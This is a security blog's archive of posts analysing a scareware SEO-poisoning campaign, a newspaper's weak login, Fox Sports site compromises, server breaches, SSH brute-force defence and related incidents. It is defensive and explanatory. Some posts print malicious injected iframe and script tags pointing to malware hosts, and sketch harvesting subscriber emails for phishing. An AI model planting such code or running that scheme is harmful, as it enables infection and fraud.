Hacking

You are currently browsing the archive for the Hacking category.

Dissection of an Active Malware Campaign

August 2, 2010 in Browser security, Hacking, Web, malware | No comments

If you have used the web for any length of time at all, it is quite likely that you have seen a pop-up box similar to the one above on your computer when visiting a web site.  In the security industry this type of malware is frequently referred to as scareware or rogue anti-virus.  When confronted with this message, many people will unsuspectingly click the “OK” button which will usually install some type of malware that claims your machine is infected with a virus.  It then offers to remove the virus if you purchase a product.  The problem is, not only is this not going to protect your machine, but will likely lead to further system compromise and possibly the loss of personally identifiable information or credit card data.

A client of mine recently called to inform me that his system had been infected with malware after clicking the “OK” button on the above pop-up box.  After removing the malware from his machine, I decided to dig further into this scareware campaign.  The client reported that he performed a search for “tatiana banx” and one of the top 10 results took him to this site.

I started my analysis by performing the same search as my client.  The results of my search are shown below.  Notice the 10th result which I have highlighted with a red arrow.

The URL is hxxp://collin-county-real-estate.rmdfw.com/gsfyn/yuxfm.php?gu=500242.  Also notice all the keywords listed for “tatiana”.  This one caught my attention and sure enough, clicking on this link will take you to a rogue AV site.  Moreover, your browser will become unusable except to click the “OK” button.  In fact, if you click on any part of the pop-up box the malware will be installed, indicating that clickjacking is part of this attack as well.  The only way to prevent infection after clicking on the link in the search result is to kill the browser process. Clicking on any part of the pop-up box results in infection.

So, the first part of this scareware campaign is the use of SEO poisoning to generate high search results for the term “tatiana banx” among others.  This is a common technique used by scammers to increase traffic to their sites and to increase infection rates.  But how did they do this?  I began by investigating the collin-county-real-estate.rmdfw.com site.  This site is the Dallas-Fort Worth Re/Max Realtor web site.  The A record for this server is 216.177.141.4 with a PTR of web17.websitesource.net.  Thus, it appears that this site is hosted at WebSiteSource with a location somewhere in Kansas if the geoIP information is accurate.   Next I examined the web server itself and found that directory listing was enabled which led to a treasure trove of interesting information.

This is only a partial list of over 330 files on this server that appear to be part of an SEO poisoning campaign.  Examination of these files indicates that this server is being used to manipulate search results for many, many different search terms.  For example, the search I performed for “tatiana banx” brought the result hxxp://collin-county-real-estate.rmdfw.com/gsfyn/yuxfm.php?gu=500242.  A partial listing of the contents of the file 500242 is listed below:

<a href=hxxp://collin-county-real-estate.rmdfw.com>collin-county-real-estate.rmd
fw.com</a><p> tatiana milovani </p>
<p> shte eet glawa ivanova tatiana che </p>
<p> eest ivanova tatiana dean electrical </p>
<p> tatiana narvaez </p>
<p> life info on tatiana golovin </p>
<p> tatiana isotov </p>
<p> mary tatiana krot </p>
<p> tatiana fistrovic and us visa </p>
<p> tatiana gregorieva </p>
<p> tatiana keeshan </p>
<p> tatiana petit </p>
<p> tatiana scam </p>
<p> tatiana startseva parkville </p>
<p> chris tatiana </p>
<p> tatiana free pics </p>
<p> tatiana nikolaevna tumanova </p>
<p> tatiana ali in king mag </p>
<p> tatiana jones </p>
<p> tatiana petersen </p>
<p> find tatiana schwappach </p>
<p> tatiana alverez </p>

Other files on this server show similar content for different search terms.  It appears that this server is being used as part of an SEO poisoning campaign, likely without the knowledge of the web site’s owner.  Furthermore, assuming that the owners of the rmdfw.com domain are not purposely redirecting traffic to malware distribution sites, it is likely that this server has been compromised.

The next step in my analysis involves an examination of the method that the site uses for redirecting traffic from hxxp://collin-county-real-estate.rmdfw.com to another site that attempts to install malware on the visitor’s machine.  This turns out to be the most interesting part.  There is a PHP script (yuxfm.php) that redirects to various other sites that host the scareware campaign.  You will only be redirected if you click on the URL from a search result, indicating that the referer is being used to determine how traffic will be handled.  Using a proxy to capture all of the communication between my system and the servers involved, I was able to reconstruct the sequence of events.  After performing a search and clicking on the URL hxxp://collin-county-real-estate.rmdfw.com/gsfyn/yuxfm.php?gu=500242 which was the 10th result presented, the server responds with a 302 redirect to one of several different URLs.  Below is the original request:

GET http://collin-county-real-estate.rmdfw.com/gsyfn/yuxfm.php?gu=500242 HTTP/1.1
Host: collin-county-real-estate.rmdfw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB7.1 (.NET CLR 3.5.30729) Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=&q=tatiana+banx&sourceid=navclient-ff&rlz=1B3GGGL_enUS340US341&ie=UTF-8
Cookie: Hello-friend=4

And the response:

HTTP/1.1 302 Found
Date: Tue, 27 Jul 2010 02:37:50 GMT
Server: Apache
Set-Cookie: Hello-friend=5
Location: hxxp://zeoro1.strangled.net/3/?c=947
Content-Type: text/html

In this case I was redirected to hxxp://zeoro1.strangled.net/3/?c=947.  This server then presents the scareware that attempts to trick the visitor into installing malware.  Notice the javascript that gets executed on the client.  No doubt this is the source of the malware.  The site also includes images that resemble actual Windows warning messages in order to increase the likelihood that the visitor will be fooled into accepting the malware:

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<link href=”style.css” rel=”stylesheet” type=”text/css” />
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />
<meta http-equiv=”Content-Language” content=”en” />
<meta http-equiv=”Cache-control” content=”Public” />
<title>Online Protection</title>
<link rel=”icon” href=”images/favicon.ico” type=”image/x-icon” />

<link rel=”shortcut icon” href=”images/favicon.ico” type=”image/x-icon” />

<script type=”text/javascript” src=”4c4e43dde34f8.js?c=947″></script>
</head>
<body>
<div id=”loading” style=”display:block”>
<div>
<img height=”50″ width=”50″ style=”margin-right: 8px; float: left; vertical-align: top;” src=”images/loading.gif”/>
<br/>

<span id=”loadspan”>Initializing Virus Protection System…</span>
</div>
</div>
</body>
</html>

The redirected URL changes frequently in an attempt to make detection and investigation more difficult.  In fact, since I started my analysis a week ago, the  collin-county-real-estate.rmdfw.com URL no longer shows up when searching for “tatiana banx” and no longer appears to be used in this malware campaign.  However, other top 10 search results for “tatiana banx” result in the same scareware tactics.  For example, today hxxp://tmsoftwaresolutions.co.uk/linmx/plol.php?gi=438195 shows up as the number 6 result.  It is also important to keep in mind that this type of attack is not confined to only searches for “tatiana banx”.  It is clear that whoever is behind this attack is targeting many different search terms and thus all search results should be viewed with care.  Also, it appears that there are many compromised servers that are part of this campaign leading to the conclusion that this is not an isolated case.

To summarize, this scareware campaign makes use of a variety of techniques in order to spread its malware.  First, it uses compromised hosts to manipulate search results and drive traffic to its servers, a technique called SEO poisoning.  When a visitor clicks on one of these bogus search results, they are then redirected to a the malware delivery host which serves up content designed to make the visitor think their machine is infected with a virus.  If the visitor clicks on the pop-up box to try and “remove” the virus, they will actually be installing malware on their machine.  This malware pretends to be an anti-virus program, but in fact is malicious software.  In the the near future I will be conducting further analysis on the hosts involved, how they may have been compromised and used as part of this malware distribution campaign, and the nature of the malware itself.



NewsandObserver.com Weak Authentication

February 16, 2010 in Hacking, Vulnerabilities | 5 comments

Recently I decided that I would no longer maintain my subscription to the local newspaper, The News and Observer.  Like many people I find that I get most of my news online these days and didn’t want to continue paying for something I didn’t use.  I decided to look at their web site to see if I could cancel my subscription online.  This is where I discovered that the newsandobserver.com uses a terrible authentication mechanism that can lead to the disclosure of personal information and unauthorized changes to paper delivery and other subscription options.

The crux of the problem is that the web site relies on publicly available information to authenticate subscribers.  Below is a screenshot of the subscriber login screen.

As you can see, all that is required to login to a subscriber account is a phone number and house number.  Both of these pieces of information are easily obtained online for most people.  After authentication, you have access to the subscriber’s account where you can gain additional information about the them.  The most important information that you can get access to is the subscriber’s email address.  This would be useful to scammers who could setup a fake site that resembles the real newsandobserver.com, send the subscriber an email telling them that they need to update their account information, and then obtain their credit card or other financial account data.  Below is a screenshot of my account home page.

Another thing that you can do within the subscriber section is manipulate delivery options.  For example, you can put stops on delivery or extend your subscription.  This would allow an unauthorized person to put a hold on someone else’s paper delivery or even change the length of their subscription, both of which could have a financial impact on the subscriber.  Below is a screenshot showing the ability to change these options.

Lastly, subscribers are able to change their personal information such as email address and phone number.  There is also a check-box to disable email notification of account changes.  A scammer could use this option to prevent notifications from being sent to the subscriber after he made changes to the account.  By updating the email address and phone number to one of his choosing, he may even be able to use social engineering to obtain credit card information from an N&O customer service representative.  Below is a screenshot of the page that allows a subscriber to change personal information.

Such a weak authentication mechanism is inexcusable for the second largest newspaper in the state of North Carolina.  With over 750,000 print and online readers, there are many opportunities for scammers to use this weakness to obtain subscribers’ personally identifiable information and potentially additional financial information.  It would not be difficult to automate a process for gathering phone numbers and house numbers for prominent people in North Carolina, many of whom are likely to subscribe to the News and Observer, attempt to login as these individuals, and obtain their email addresses.  With such a list in hand, it would be possible to send them fake emails appearing to be from the N&O that could trick them into divulging their credit card numbers.

I have contacted the NewsandObserver.com to report this vulnerability to them.  Remediation is not difficult.  There are many types of authentication mechanisms that work well and the OWASP has a great site dedicated to this topic.  I hope that they take advantage of it to correct this issue.

Fox Sports Compromised… Again

December 30, 2009 in Hacking, Web | No comments

In October of 2009 the Fox Sports web site was found to have been compromised with an iframe that redirected visitors to a site hosting malicious content.  The affected URL was hxxp://msn.foxsports.com/fantasy/baseball/hotstreak/external and an example of the injected code is below:

<iframe src=”hxxp://thingre.com/in.php” width=”1″ height=”1″ style=”visibility:hidden;position:absolute”></iframe>

Anyone who accessed this site while the malicious code was active could potentially have had their computer infected with malware.  Fox Sports administrators eventually removed the iframe, but today the same page was infected again.  This time the below two script tags were injected:

<script src=hxxp://akcworld.com/genco/fusion-request-a-password.php ></script><body topmargin=”0″ leftmargin=”0″ marginheight=”0″ marginwidth=”0″>

and

<script src=’hxxp://nt002.cn/E/J.JS’></script>

These same two scripts were also used in the October Fox Sports web site compromise incident.  The akcworld.com  and nt002.cn domains are widely known to host malicious content and are frequently used as part of the Gumblar campaign.  At approximately 9:50pm I checked the Fox Sports web site to verify if the page was still infected.  It was not.  I then checked the page information and saw that it had been modified at 9:39pm EST, just 10 minutes before I checked the site.

foxsports

The Fox Sports administrators moved very quickly this time to rectify the site compared to the October incident which nearly two weeks to address.  However, this situation obviously begs the question how the Fox Sports web site keeps being compromised.  I can think of several possibilities that would explain how this could occur:  1)  The hackers installed a backdoor that they continue to use for access 2) The hackers continue to use compromised credentials to the web site 3) A vulnerability exists in the web site that has not been remediated 4) Fox Sports administrators restored an older version of the page that included the malicious code from the October hack.  We won’t likely learn the root cause of this compromise any time soon, but it is certain that unless Fox Sports takes preventative action, it will probably occur again.

Even Security Pros Get Owned

August 1, 2009 in Hacking, Web

On Thursday we awoke to a good old-fashioned web site defacement and the public release of emails and other personal information of some of the most prominent names in the information security field.  A group hacked into the servers of Dan Kaminsky, Julien Tinnes, and Kevin Mitnick to name just a few.  The information they obtained and disclosed includes email correspondence, phone numbers, userids and passwords of many of the world’s most notable whitehat security researchers.  Some of this information is very personal and quite embarrassing to have publicly disclosed to the entire Internet.  Moreover, it is likely that this disclosure will lead to a great deal of spam and nuisance phone calls for the people who’s information was disclosed, as well as possible attacks on other systems.

These days it is unusual for hackers to deface web sites and publicly embarrass others.  Most are more concerned with making money and thus try to work silently without being noticed.  The defacement of Kaminsky’s web site is reminicent of the old school gamesmanship in which hackers would try to publicly humiliate others by defacing their web sites.  This attack has prompted Kaminsky take his site (http://www.doxpara.com) offline, although you can still see the defaced version in Google’s cache.  I have also included it below.

doxpara

It is not known how the hackers were able to crack the servers, but it goes to show that a determined attacker can probably find an exploitable vulnerability in any system if given enough time and resources.  There is no such thing as a completely secure system, except one that is turned off.  It is the job of the security professional to reduce risk to an acceptable level given the value of the asset that is being protected.  While none of the information disclosed could be considered valuable in a monetary sense, having it disclosed so publicly is certainly embarrasing and could damage their reputations and their businesses.  No system is safe and we should all take heed to the threats that are out there.

Hoaxes as Threats

July 27, 2009 in Hacking, Web

emma-watson

A few days ago I went to see the latest installment of the Harry Potter movies.  So it is timely that a new Internet hoax emerged today playing on the popularity of the film and its actors.  A hoax spread rapidly today via email and social networking sites such as Facebook and Twitter about the death of Emma Watson who plays Hermione Granger in the popular films.  The hoax claimed that the actress had died in a car accident.  Below is one example of the bogus news report:

On July 24, 2009, Watson was en route to her mansion in Oxfordshire, England. Police footage captured her driving with speeds up to 80 miles per hour on very narrow roads. Oxfordshire paramedics received a 999 call at 12:22 p.m. (GMT), about an sportcar having crashed into a wall at a petrol station. At this point it was still unknown that the victim was indeed Emma Watson. Three minutes after the call got through, paramedics arrived at Watson's location. She was reportedly not breathing and the car was total loss. After 5 minutes the Oxfordshire Fire Department managed to get Watson out of her car. Resuscitation efforts continued en route to the Oxfordshire's Medical Center, and for an hour after arriving there at 1:45 p.m. (GMT). She was pronounced dead at 2:10 p.m. (GMT).

Unfortunately, by forwarding this information, people are unwittingly helping scammers install rogue anti-virus software on unsuspecting users’ computers.  Criminals have used blackhat SEO poisoning to get searches related to Emma Watson’s death ranked very high in search results.  For example, I did a Google search on “emma watson die” and the 6th and 8th results were redirects to malicious sites that attempted to install rogue anti-virus software:

rogueav

Fortunately, Google warns that this is a malicious web site due its listing at stopbadware.org.   However, there are many others besides this one in the top 20 search results so do yourself a favor and stay away from them.  And most importantly, don’t forward any news articles or emails related to this hoax.  In general, this is good advice for email chain letters, get rich quick spam, jokes, and any other nuisance email that finds its way into your inbox.

Mitigating SSH Brute Force Attacks

December 11, 2008 in Hacking


If you manage a system connected to the Internet that allows inbound SSH traffic, and you check your system logs periodically, no doubt you have noticed the failed login attempts from rogue systems trying to brute force your machine. These brute force attempts are typically generated by systems that have been compromised themselves (bots) and are attempting to infect more systems to add to the botnet. They generally are not very tactful, generating lots of logs and setting off any IDS that may be monitoring the network. Below is an example of the logs generated by such brute force attempts on a RHL compatible system:

Dec 8 13:28:51 websrv1 sshd[14407]: Failed password for invalid user test from
201.47.187.138 port 55732 ssh2
Dec 8 13:28:54 websrv1 sshd[14409]: Failed password for invalid user anda from
201.47.187.138 port 56250 ssh2
Dec 8 13:28:58 websrv1 sshd[14411]: Failed password for invalid user jb from 20
1.47.187.138 port 56723 ssh2
Dec 8 13:29:02 websrv1 sshd[14413]: Failed password for invalid user cvsuser fr
om 201.47.187.138 port 57255 ssh2
Dec 8 13:29:05 websrv1 sshd[14415]: Failed password for invalid user cvsuser1 f
rom 201.47.187.138 port 57761 ssh2
Dec 8 13:29:09 websrv1 sshd[14417]: Failed password for invalid user mana from
201.47.187.138 port 58263 ssh2
Dec 8 13:29:13 websrv1 sshd[14420]: Failed password for invalid user mysql from
201.47.187.138 port 58810 ssh2
Dec 8 13:29:17 websrv1 sshd[14422]: Failed password for invalid user mysql from
201.47.187.138 port 59342 ssh2

Here you can see that the host 201.47.187.138 tried to login as the user mysql, mana, cvsuser1, cvsuser, jb, anda, and test all in the space of about 26 seconds. And this was just one snippet of logs from Dec 8. This happens everyday, many times per day, and from many different attacking systems. Large networks frequently have intrusion detection/prevention systems to help block these types of attacks. But what should administrators of small networks, with few resources do to combat these brute force attempts?

First, you have to check your logs. Manual scanning of logs is fine, but there are tools that can make this task much easier. One example of such a tool is Logwatch which comes as part of many Linux distributions. It will analyze your logs and send you reports of system activity which will help you spot these types of events. Second, keep the number of accounts that are allowed to login to the system via SSH to a minimum. Always use the “AllowUsers” option to specify which accounts are allowed access remotely and absolutely, do not allow root to login via SSH. This is the first account bruters attempt to crack when trying to exploit your system. Finally, take advantage of iptables to block access to those systems that are attempting to access your system illegally. You can either do this manually or write a script to block them automatically based on log entries. There are also a number of blacklists available on the Internet that provide a good starting point of hosts/networks to block even if they have not tried to brute force your machine (yet).

Newer attack techniques attempt to be more subtle in the hopes that the attackers will not be noticed by IDPS systems. However, they are still easy to spot with human analysis and the techniques mentioned above. Stay alert and keep your systems secure. We are all in this together.

A New Kind of Honey Stick

September 3, 2008 in Hacking, Social Engineering, malware

When I visit the local farmers market with my family, my children are always excited to buy a couple of honey sticks from the local bee keepers.  These are essentially plastic tubes about the size of a straw filled with honey.  Unlike these delicious treats, there is another type of honey stick that isn’t so tasty and could be very harmful to your computer.  The Honey Stick Project, which was started earlier this year, is a research project designed to determine how many people will plug a USB thumb drive that they find in a random place into their computer.  These USB drives have a program on them to “phone home” so that the researcher can determine what percentage of thumb drives distributed to random locations will be accessed.  The results so far?  Out of 33 deployed honey sticks, 42% of them have been accessed.

You may be wondering what the issue is with plugging a found thumb drive into your computer.  I mean hey, who wouldn’t want a free thumb drive, right?  Unfortunately, by installing a thumb drive from an unknown source into your computer you are putting your system at risk of infection by a virus or trojan.  The autorun feature of many operating systems can automatically execute a malicious program on the drive which could lead to the compromise of the machine.  Such a compromise could lead the theft of your bank account information, personal information, usernames, passwords and more.  So if you ever find a USB drive or any other type of media (CDROM, DVD, etc), don’t put it in your machine unless you are feeling very lucky that day.

A well known technique used to test the security of a company’s network is to distribute a few thumb drives in the parking lot of the target company.  These thumb drives will have software on them that will automatically install when the drive is plugged into a computer leading to the compromise of the system and potentially other systems within the corporate network.  Many unsuspecting people will see these thumb drives while walking through the parking lot, pick it up and plug it in to their computer.  Our curiosity often gets the best of us leading to unintented consequences (like a visit from the corporate security administrator).

Recently a virus was detected on laptops used in the International Space Station.  It is suspected that they were transmitted via shared USB drives.  There was nothing sweet in those sticks!

Red Hat Servers Hacked

August 25, 2008 in Hacking

On Friday, August 22, Red Hat announced on its web site that one or more of the servers used as part of the Fedora project had been compromised by hackers.  Even more troubling is the fact that the compromised servers included one that was used to signed Fedora packages.  Company officials claim to be confident that the passphrase that protects the private key used to sign the packages was not obtained.  However, the company did reinstall the affected systems and issued new keys for the signing of the packages as a precautionary measure which meant downtime for the affected servers.

But the hack did not stop there.  Red Hat also announced that a breach occurred on some its production systems which allowed the intruder to create and sign some OpenSSL packages for Red Hat Enterprise Linux 4 and 5!  According to Red hat:

In connection with the incident, the intruder was able to sign a small
number of OpenSSH packages relating only to Red Hat Enterprise Linux 4
(i386 and x86_64 architectures only) and Red Hat Enterprise Linux 5 (x86_64
architecture only). As a precautionary measure, we are releasing an
updated version of these packages, and have published a list of the
tampered packages and how to detect them at
http://www.redhat.com/security/data/openssh-blacklist.html.

At this point Red Hat does not believe that its Red Hat Network (RHN) service, which allows customers to download packages from Red Hat, was compromised.  As a result, they do not think that the tampered packages have been widely distributed.  Let’s hope they are right.

The problem with type of situation is that it is very difficult to tell the extent of the damage.  Red Hat believes they caught the intrusion quickly and rectified the situation.  But what if this has been going on for months.  It seems at least possible that other packages may have been hacked, signed and distributed without their knowledge.  This demonstrates one of the major security issues for software vendors.  How to write, maintain and distribute software in a secure manner.  By all accounts Red Hat was following good practices.  They signed all their packages with their private key so that those who downloaded them could verify their authenticity and integrity.  But when your signing server is compromised all bets are off.

Red Hat is not the first company to be facing such issues.  In 2004 hackers were able to steal 800MBs of source code from Cisco leading to wide speculation about the security of their products.  A similar theft of source code occurred with Microsoft in that same year.  Software vendors must be extremely vigilent in protecting their products.  One tampered package that goes unnoticed could lead to backdoors in thousands of systems.  Let’s hope that this did not occur with Red Hat.

Get Adobe Flash playerPlugin by wpburn.com wordpress themes